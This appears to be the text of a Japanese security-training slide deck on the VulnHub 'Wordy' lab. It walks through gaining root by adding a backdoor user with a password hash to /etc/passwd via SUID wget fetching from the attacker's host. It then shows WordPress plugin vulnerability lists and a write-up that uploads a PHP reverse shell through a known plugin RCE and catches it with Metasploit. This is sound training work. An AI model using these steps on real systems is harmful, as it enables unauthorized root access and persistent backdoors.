  • 82. © 2021 Ierae Security Inc. All Rights Reserved. 81 Walkthrough: Wordy 目的:権限昇格フローの発見  /etc/passwdの書き換え ユーザ名とパスワードのハッシュのみを書き換えれば良いため、指定するパスワードハッシュを生成します。 パスワードハッシュは以下の形式になっており、idの値によってハッシュアルゴリズムを特定することができます。 $id$salt$hash 1: MD5 5: SHA256 6: SHA512 こうしたパスワードハッシュはopensslコマンドのpasswdサブコマンドを用いて、以下のように生成することができ ます。 openssl passwd -<id> -salt <Salt> <Password>  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 83. © 2021 Ierae Security Inc. All Rights Reserved. 82 Walkthrough: Wordy 目的:権限昇格フローの発見  /etc/passwdの書き換え WordyサーバのpasswdをKaliにコピーし、末尾に1行追記します。 その後、Python製のWebサーバを起動し、改ざんしたpasswdファイルを配送する用意をします。 vim passwd echo 'ieraebackdoor:$1$ierae$1G/feXS0Di6qME/LP6Zg90:0:0:root:/root:/bin/bash' >> passwd python3 –m http.server 80  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 84. © 2021 Ierae Security Inc. All Rights Reserved. 83 Walkthrough: Wordy 目的:権限昇格フローの発見  /etc/passwdの書き換え wgetのSUIDを悪用してWordyサーバの/etc/passwdを書き換えます。 wget http://<Kali's IP>/passwd –O /etc/passwd  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 85. © 2021 Ierae Security Inc. All Rights Reserved. 84 Walkthrough: Wordy 目的:権限昇格フローの発見  /etc/passwdの書き換え /etc/passwdを書き換えたため、suコマンドを用いてbackdoorのユーザにログインし直すことができます。 結果として、root権限を奪取することに成功しました。 su <Backdoor UserName>  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 86. © 2021 Ierae Security Inc. All Rights Reserved. 85 Walkthrough: Wordy 目的:権限昇格フローの発見  /etc/passwdの書き換え /etc/passwdを書き換えたため、suコマンドを用いてbackdoorのユーザにログインし直すことができます。 結果として、root権限を奪取することに成功しました。 su <Backdoor UserName>  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 87. © 2021 Ierae Security Inc. All Rights Reserved. 86 休憩(5分) 休憩(5分)
  • 88. © 2021 Ierae Security Inc. All Rights Reserved. 87 チャレンジ問題 チャレンジ問題
  • 89. © 2021 Ierae Security Inc. All Rights Reserved. 88 チャレンジ問題 [!] Title: Gwolle Guestbook <= 1.5.3 - Remote File Inclusion (RFI) [!] Title: Gwolle Guestbook <= 2.1.0 - Cross-Site Request Forgery (CSRF) [!] Title: Gwolle Guestbook <= 2.1.0 - Unauthenticated Stored Cross-Site Scripting (XSS) [!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS) [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) [!] Title: Mail Masta 1.0 - Multiple SQL Injection [!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload [!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS) [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI) [!] Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS) [!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS) [!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS) [!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi [!] Title: EasyCart <= 3.0.15 - Unrestricted File Upload [!] Title: EasyCart 1.1.30 - 3.0.20 - Privilege Escalation [!] Title: WP Support Plus Responsive Ticket System < 8.0.0 – Authenticated SQL Injection [!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE) [!] Title: WP Support Plus Responsive Ticket System < 9.0.3 - Multiple Authenticated SQL Injection [!] Title: WP Support Plus Responsive Ticket System < 9.1.2 - Stored XSS [!] Title: WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation [!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution [!] Title: WP Symposium 13.04 - Unvalidated Redirect [!] Title: WP Symposium <= 12.07.07 - Authentication Bypass [!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload [!] Title: WP Symposium <= 15.1 - SQL Injection [!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection [!] Title: WP Symposium <= 15.1 - Blind SQL Injection [!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)  別の方法でReverse Shellを奪取しよう!
  • 90. © 2021 Ierae Security Inc. All Rights Reserved. 89 チャレンジ問題 [!] Title: Gwolle Guestbook <= 1.5.3 - Remote File Inclusion (RFI) [!] Title: Gwolle Guestbook <= 2.1.0 - Cross-Site Request Forgery (CSRF) [!] Title: Gwolle Guestbook <= 2.1.0 - Unauthenticated Stored Cross-Site Scripting (XSS) [!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS) [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) [!] Title: Mail Masta 1.0 - Multiple SQL Injection [!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload [!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS) [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI) [!] Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS) [!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS) [!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS) [!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi [!] Title: EasyCart <= 3.0.15 - Unrestricted File Upload [!] Title: EasyCart 1.1.30 - 3.0.20 - Privilege Escalation [!] Title: WP Support Plus Responsive Ticket System < 8.0.0 – Authenticated SQL Injection [!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE) [!] Title: WP Support Plus Responsive Ticket System < 9.0.3 - Multiple Authenticated SQL Injection [!] Title: WP Support Plus Responsive Ticket System < 9.1.2 - Stored XSS [!] Title: WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation [!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution [!] Title: WP Symposium 13.04 - Unvalidated Redirect [!] Title: WP Symposium <= 12.07.07 - Authentication Bypass [!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload [!] Title: WP Symposium <= 15.1 - SQL Injection [!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection [!] Title: WP Symposium <= 15.1 - Blind SQL Injection [!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)  別の方法でReverse Shellを奪取しよう!
  • 91. © 2021 Ierae Security Inc. All Rights Reserved. 90 チャレンジ問題 [!] Title: Gwolle Guestbook <= 1.5.3 - Remote File Inclusion (RFI) [!] Title: Gwolle Guestbook <= 2.1.0 - Cross-Site Request Forgery (CSRF) [!] Title: Gwolle Guestbook <= 2.1.0 - Unauthenticated Stored Cross-Site Scripting (XSS) [!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS) [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) [!] Title: Mail Masta 1.0 - Multiple SQL Injection [!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload [!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS) [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI) [!] Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS) [!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS) [!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS) [!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi [!] Title: EasyCart <= 3.0.15 - Unrestricted File Upload [!] Title: EasyCart 1.1.30 - 3.0.20 - Privilege Escalation [!] Title: WP Support Plus Responsive Ticket System < 8.0.0 – Authenticated SQL Injection [!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE) [!] Title: WP Support Plus Responsive Ticket System < 9.0.3 - Multiple Authenticated SQL Injection [!] Title: WP Support Plus Responsive Ticket System < 9.1.2 - Stored XSS [!] Title: WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation [!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution [!] Title: WP Symposium 13.04 - Unvalidated Redirect [!] Title: WP Symposium <= 12.07.07 - Authentication Bypass [!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload [!] Title: WP Symposium <= 15.1 - SQL Injection [!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection [!] Title: WP Symposium <= 15.1 - Blind SQL Injection [!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)  別の方法でReverse Shellを奪取しよう!
  • 92. © 2021 Ierae Security Inc. All Rights Reserved. 91 チャレンジ問題 [!] Title: Gwolle Guestbook <= 1.5.3 - Remote File Inclusion (RFI) [!] Title: Gwolle Guestbook <= 2.1.0 - Cross-Site Request Forgery (CSRF) [!] Title: Gwolle Guestbook <= 2.1.0 - Unauthenticated Stored Cross-Site Scripting (XSS) [!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS) [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) [!] Title: Mail Masta 1.0 - Multiple SQL Injection [!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload [!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS) [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI) [!] Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS) [!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS) [!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS) [!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi [!] Title: EasyCart <= 3.0.15 - Unrestricted File Upload [!] Title: EasyCart 1.1.30 - 3.0.20 - Privilege Escalation [!] Title: WP Support Plus Responsive Ticket System < 8.0.0 – Authenticated SQL Injection [!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE) [!] Title: WP Support Plus Responsive Ticket System < 9.0.3 - Multiple Authenticated SQL Injection [!] Title: WP Support Plus Responsive Ticket System < 9.1.2 - Stored XSS [!] Title: WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation [!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution [!] Title: WP Symposium 13.04 - Unvalidated Redirect [!] Title: WP Symposium <= 12.07.07 - Authentication Bypass [!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload [!] Title: WP Symposium <= 15.1 - SQL Injection [!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection [!] Title: WP Symposium <= 15.1 - Blind SQL Injection [!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)  別の方法でReverse Shellを奪取しよう!
  • 93. © 2021 Ierae Security Inc. All Rights Reserved. 92 チャレンジ問題のヒント  WPScanのReferencesやGoogle検索からExploit Codeを見つけよう!  ディレクトリ・リスティングを使って、アクセスすべきURLを特定しよう!  ヒント
  • 94. © 2021 Ierae Security Inc. All Rights Reserved. 93 チャレンジ問題のヒント  WPScanのReferencesやGoogle検索からExploit Codeを見つけよう!  ディレクトリ・リスティングを使って、アクセスすべきURLを特定しよう!  ヒント
  • 95. © 2021 Ierae Security Inc. All Rights Reserved. 94 チャレンジ問題のヒント  WPScanのReferencesやGoogle検索からExploit Codeを見つけよう!  ディレクトリ・リスティングを使って、アクセスすべきURLを特定しよう!  ヒント
  • 96. © 2021 Ierae Security Inc. All Rights Reserved. 95 チャレンジ問題 Writeup チャレンジ問題 Writeup
  • 97. © 2021 Ierae Security Inc. All Rights Reserved. 96 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution searchsploit WP Support Plus Responsive  別の方法でReverse Shellを奪取しよう! URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 98. © 2021 Ierae Security Inc. All Rights Reserved. 97 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution searchsploit WP Support Plus Responsive  別の方法でReverse Shellを奪取しよう! URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 99. © 2021 Ierae Security Inc. All Rights Reserved. 98 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution searchsploit WP Support Plus Responsive  別の方法でReverse Shellを奪取しよう!
  • 100. © 2021 Ierae Security Inc. All Rights Reserved. 99 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution vim exploit.html cp shell.php shell.phtml python3 –m http.server 80  別の方法でReverse Shellを奪取しよう! URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 101. © 2021 Ierae Security Inc. All Rights Reserved. 10 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution msf6 exploit(multi/handler) > options msf6 exploit(multi/handler) > run  別の方法でReverse Shellを奪取しよう! URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 102. © 2021 Ierae Security Inc. All Rights Reserved. 10 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution http://127.0.0.1/exploit.htmlからshell.phtmlをサーバにアップロード -> http://<IP Address>/wordpress/wp-content/uploads/wpsp/shell.phtml  別の方法でReverse Shellを奪取しよう! URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 103. © 2021 Ierae Security Inc. All Rights Reserved. 10 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution http://127.0.0.1/exploit.htmlからshell.phtmlをサーバにアップロード -> http://<IP Address>/wordpress/wp-content/uploads/wpsp/shell.phtml  別の方法でReverse Shellを奪取しよう! URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 104. © 2021 Ierae Security Inc. All Rights Reserved. 10 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution http://192.168.43.13/wordpress/wp-content/uploads/wpsp/  別の方法でReverse Shellを奪取しよう! URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 105. © 2021 Ierae Security Inc. All Rights Reserved. 10 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution http://192.168.43.13/wordpress/wp-content/uploads/wpsp/  別の方法でReverse Shellを奪取しよう!
  • 106. © 2021 Ierae Security Inc. All Rights Reserved. 10 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution http://192.168.43.13/wordpress/wp-content/uploads/wpsp/  別の方法でReverse Shellを奪取しよう!